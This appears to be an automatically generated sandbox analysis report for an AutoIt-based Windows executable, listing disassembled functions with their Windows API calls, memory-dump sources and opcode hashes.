                                                                      Function 00C814CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00C814FF
                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00C81506
                                                                      • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00C81515
                                                                      • CloseHandle.KERNEL32(00000004), ref: 00C81520
                                                                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C8154F
                                                                      • DestroyEnvironmentBlock.USERENV(00000000), ref: 00C81563
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                      • String ID:
                                                                      • API String ID: 1413079979-0
                                                                      • Opcode ID: ddc5305e40b9db596df9c2b3fdb167aafbecd34bc706a54a30e18f2bf6b562e1
                                                                      • Instruction ID: 51db26dc862fea9ff23dfbae7a1e2c3be45b2de6c767b7b7e4a2ba2341f1fefd
                                                                      • Opcode Fuzzy Hash: ddc5305e40b9db596df9c2b3fdb167aafbecd34bc706a54a30e18f2bf6b562e1
                                                                      • Instruction Fuzzy Hash: 88115972504209ABDF119F98ED89FDE7BADEF48718F088124FE15A2060C3758E61DB60
                                                                      Function 00C43382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetLastError.KERNEL32(?,?,00C43379,00C42FE5), ref: 00C43390
                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00C4339E
                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00C433B7
                                                                      • SetLastError.KERNEL32(00000000,?,00C43379,00C42FE5), ref: 00C43409
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLastValue___vcrt_
                                                                      • String ID:
                                                                      • API String ID: 3852720340-0
                                                                      • Opcode ID: 65f067905b16b2974328cca6dbe2433e1768148e1a02f055c07ee2561a8128a5
                                                                      • Instruction ID: c4eea27888a31e2114a075bdc8d7b112f357a0fa3e7d7e84051fe99241149b2c
                                                                      • Opcode Fuzzy Hash: 65f067905b16b2974328cca6dbe2433e1768148e1a02f055c07ee2561a8128a5
                                                                      • Instruction Fuzzy Hash: 4E01D4336093A2BEA6292B757CC5BAF2EA4FB957797200229F530852F1EF114F036544
                                                                      Function 00C52D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetLastError.KERNEL32(?,?,00C55686,00C63CD6,?,00000000,?,00C55B6A,?,?,?,?,?,00C4E6D1,?,00CE8A48), ref: 00C52D78
                                                                      • _free.LIBCMT ref: 00C52DAB
                                                                      • _free.LIBCMT ref: 00C52DD3
                                                                      • SetLastError.KERNEL32(00000000,?,?,?,?,00C4E6D1,?,00CE8A48,00000010,00C24F4A,?,?,00000000,00C63CD6), ref: 00C52DE0
                                                                      • SetLastError.KERNEL32(00000000,?,?,?,?,00C4E6D1,?,00CE8A48,00000010,00C24F4A,?,?,00000000,00C63CD6), ref: 00C52DEC
                                                                      • _abort.LIBCMT ref: 00C52DF2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$_free$_abort
                                                                      • String ID:
                                                                      • API String ID: 3160817290-0
                                                                      • Opcode ID: 9c0464613d2ccae15dedbf6a6573479cab6ee0190a1f5d47c54718cf470ab030
                                                                      • Instruction ID: 86dbce0b7ecbd49f5b152023c23c40247a3b84725771b1304143fe33be48a725
                                                                      • Opcode Fuzzy Hash: 9c0464613d2ccae15dedbf6a6573479cab6ee0190a1f5d47c54718cf470ab030
                                                                      • Instruction Fuzzy Hash: BBF0A43E504A0027C2122735AC46F5E26E9ABD37A3F244519FC34A21E2EF2489CEA168
                                                                      Function 00C851FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetDC.USER32(00000000), ref: 00C85218
                                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 00C85229
                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C85230
                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00C85238
                                                                      • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00C8524F
                                                                      • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00C85261
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: CapsDevice$Release
                                                                      • String ID:
                                                                      • API String ID: 1035833867-0
                                                                      • Opcode ID: 8ba81f0e943880d26276a8ae79dbcd80dab63389c56c69099340ca5cfc8770e8
                                                                      • Instruction ID: c3434d36a12fc9dedc797d275c028cb886714c15cd83d2ca59f358335ea2cd9d
                                                                      • Opcode Fuzzy Hash: 8ba81f0e943880d26276a8ae79dbcd80dab63389c56c69099340ca5cfc8770e8
                                                                      • Instruction Fuzzy Hash: E2016275E00718BBEB10ABE99C89F5EBFB8EF48751F044165FA04A7281DA709D00CFA0
                                                                      Function 00CB8A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00C39639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00C39693
                                                                        • Part of subcall function 00C39639: SelectObject.GDI32(?,00000000), ref: 00C396A2
                                                                        • Part of subcall function 00C39639: BeginPath.GDI32(?), ref: 00C396B9
                                                                        • Part of subcall function 00C39639: SelectObject.GDI32(?,00000000), ref: 00C396E2
                                                                      • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00CB8A4E
                                                                      • LineTo.GDI32(?,00000003,00000000), ref: 00CB8A62
                                                                      • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00CB8A70
                                                                      • LineTo.GDI32(?,00000000,00000003), ref: 00CB8A80
                                                                      • EndPath.GDI32(?), ref: 00CB8A90
                                                                      • StrokePath.GDI32(?), ref: 00CB8AA0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                      • String ID:
                                                                      • API String ID: 43455801-0
                                                                      • Opcode ID: 072e375aa9d0e5509b3b769cf4533be92b086fad1b58be6c271eab74bdfd6f95
                                                                      • Instruction ID: 3875a33408708700cb102ed4ff8591a79e8b0c7f7285bc2b7f8f4cec42199d64
                                                                      • Opcode Fuzzy Hash: 072e375aa9d0e5509b3b769cf4533be92b086fad1b58be6c271eab74bdfd6f95
                                                                      • Instruction Fuzzy Hash: EC11C576400109FFEB129F94EC88FAE7F6DEB08354F048122BA599A1A1C7719E55DFA0
                                                                      Function 00C21BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00C21BF4
                                                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 00C21BFC
                                                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00C21C07
                                                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00C21C12
                                                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 00C21C1A
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C21C22
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual
                                                                      • String ID:
                                                                      • API String ID: 4278518827-0
                                                                      • Opcode ID: ffeb1182f14e4a45a2d66d06e94a39a89cb9b7c21d0db16fef00c89b947cb706
                                                                      • Instruction ID: 704efd70c65d88b3e04932edc29a776e81e5efe5fc46c7c9c06412d8aec0d335
                                                                      • Opcode Fuzzy Hash: ffeb1182f14e4a45a2d66d06e94a39a89cb9b7c21d0db16fef00c89b947cb706
                                                                      • Instruction Fuzzy Hash: 060167B0902B5ABDE3008F6A8C85B56FFA8FF19354F00411BA15C4BA42C7F5A864CBE5
                                                                      Function 00C8EB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00C8EB30
                                                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00C8EB46
                                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 00C8EB55
                                                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C8EB64
                                                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C8EB6E
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C8EB75
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                      • String ID:
                                                                      • API String ID: 839392675-0
                                                                      • Opcode ID: 55168f2f87710c6150d6b37b4a3d370785e376a7e3343969c130587beced3a62
                                                                      • Instruction ID: 264ca7c181da8c3a7205939ad5ea3ce53967bb88866d715157cd861d18d9d054
                                                                      • Opcode Fuzzy Hash: 55168f2f87710c6150d6b37b4a3d370785e376a7e3343969c130587beced3a62
                                                                      • Instruction Fuzzy Hash: 20F03A72240158BBE7215B629C4EFEF3B7CEFCAB11F000269FA11E1091E7A05A01C6B5
                                                                      Function 00C81874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00C8187F
                                                                      • UnloadUserProfile.USERENV(?,?), ref: 00C8188B
                                                                      • CloseHandle.KERNEL32(?), ref: 00C81894
                                                                      • CloseHandle.KERNEL32(?), ref: 00C8189C
                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00C818A5
                                                                      • HeapFree.KERNEL32(00000000), ref: 00C818AC
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                      • String ID:
                                                                      • API String ID: 146765662-0
                                                                      • Opcode ID: 1937814c491f310dfce94804b11af9fabcb9a98d55a597651c2198325cc39676
                                                                      • Instruction ID: 3d0ed40f6cd388fde6f4f9e5b0b4d6c3040d4634f6f61a7f5dda520443dd3c1c
                                                                      • Opcode Fuzzy Hash: 1937814c491f310dfce94804b11af9fabcb9a98d55a597651c2198325cc39676
                                                                      • Instruction Fuzzy Hash: 6FE0C276004101BBDA015FA5ED4CB4EBB69FB59B22B508321F225A1070CB329420DB60
                                                                      Function 00C8C5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00C27620: _wcslen.LIBCMT ref: 00C27625
                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C8C6EE
                                                                      • _wcslen.LIBCMT ref: 00C8C735
                                                                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C8C79C
                                                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00C8C7CA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: ItemMenu$Info_wcslen$Default
                                                                      • String ID: 0
                                                                      • API String ID: 1227352736-4108050209
                                                                      • Opcode ID: 699daac482b1f0eaaa5e613b3ca91ae6e9e4a95888b5edfe1e0c0c0727b4f364
                                                                      • Instruction ID: b1d13fe02fbcbae4711c023bf531008b19547a43ad5a23d264aa879322e6da09
                                                                      • Opcode Fuzzy Hash: 699daac482b1f0eaaa5e613b3ca91ae6e9e4a95888b5edfe1e0c0c0727b4f364
                                                                      • Instruction Fuzzy Hash: CD51BF716143019BD754AF28C8C5B6B77E8AF49318F040A2DF9A5D31A0DB70DE04DB6A
                                                                      Function 00C81DE2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00C29CB3: _wcslen.LIBCMT ref: 00C29CBD
                                                                        • Part of subcall function 00C83CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00C83CCA
                                                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00C81E66
                                                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00C81E79
                                                                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 00C81EA9
                                                                        • Part of subcall function 00C26B57: _wcslen.LIBCMT ref: 00C26B6A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$_wcslen$ClassName
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 2081771294-1403004172
                                                                      • Opcode ID: a4d3e138fc9a44ffe926df00e98d5a8766399009a50e22d506e223d4bb1693b4
                                                                      • Instruction ID: 190b53c57860b573a1d2c21e9f7f58d268fb9b74cfd176db29d972e718209322
                                                                      • Opcode Fuzzy Hash: a4d3e138fc9a44ffe926df00e98d5a8766399009a50e22d506e223d4bb1693b4
                                                                      • Instruction Fuzzy Hash: 0321F371A00104ABDB14AB65EC89DFFB7BCEF45358F184129FC25A71E1DB744A0AA720
                                                                      Function 00C44D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00C44D1E,00C528E9,?,00C44CBE,00C528E9,00CE88B8,0000000C,00C44E15,00C528E9,00000002), ref: 00C44D8D
                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00C44DA0
                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,00C44D1E,00C528E9,?,00C44CBE,00C528E9,00CE88B8,0000000C,00C44E15,00C528E9,00000002,00000000), ref: 00C44DC3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                      • API String ID: 4061214504-1276376045
                                                                      • Opcode ID: cffedbc6aaea02fc72162c64b9067c22c7d900c0c63523aa67cf7ab52288c137
                                                                      • Instruction ID: 3ef9e3f13c2ad85737da8d371171721b8a92b8cd12a6dfa89cd5f92035d3a3f4
                                                                      • Opcode Fuzzy Hash: cffedbc6aaea02fc72162c64b9067c22c7d900c0c63523aa67cf7ab52288c137
                                                                      • Instruction Fuzzy Hash: 00F04F35A40208BBDB159F94DC89BADBFF9FF44751F1001A8F90AA2260CB715A41DB90
                                                                      Function 00C24E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00C24EDD,?,00CF1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00C24E9C
                                                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00C24EAE
                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00C24EDD,?,00CF1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00C24EC0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Library$AddressFreeLoadProc
                                                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                      • API String ID: 145871493-3689287502
                                                                      • Opcode ID: c5f2c85021aabc99e4f7f02e8ff8f2dfe8014a6d421370201af247701179a96a
                                                                      • Instruction ID: 901ca83ae5cfce3ee241049e18614def399806c5e381ebb96be0e521fb73f435
                                                                      • Opcode Fuzzy Hash: c5f2c85021aabc99e4f7f02e8ff8f2dfe8014a6d421370201af247701179a96a
                                                                      • Instruction Fuzzy Hash: A5E0CD36A027325BE2311729BC5CB5FA558AF81F62F060225FC10F3240DBA0CE0240B0
                                                                      Function 00C24E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00C63CDE,?,00CF1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00C24E62
                                                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00C24E74
                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00C63CDE,?,00CF1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00C24E87
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Library$AddressFreeLoadProc
                                                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                      • API String ID: 145871493-1355242751
                                                                      • Opcode ID: 5174a198e616a4289d098b1745ab0250853107833725d91125d1cbac01d7cfbe
                                                                      • Instruction ID: a5619f825b3202c7654cb2528b62bbfbad0e8ebf1541256f2a11a554996a19ee
                                                                      • Opcode Fuzzy Hash: 5174a198e616a4289d098b1745ab0250853107833725d91125d1cbac01d7cfbe
                                                                      • Instruction Fuzzy Hash: 4DD01236502632576A261B297C5CF8FAA18AF85B517060625F915B6124CF60CE0285E0
                                                                      Function 00C92947 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C92C05
                                                                      • DeleteFileW.KERNEL32(?), ref: 00C92C87
                                                                      • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00C92C9D
                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C92CAE
                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C92CC0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
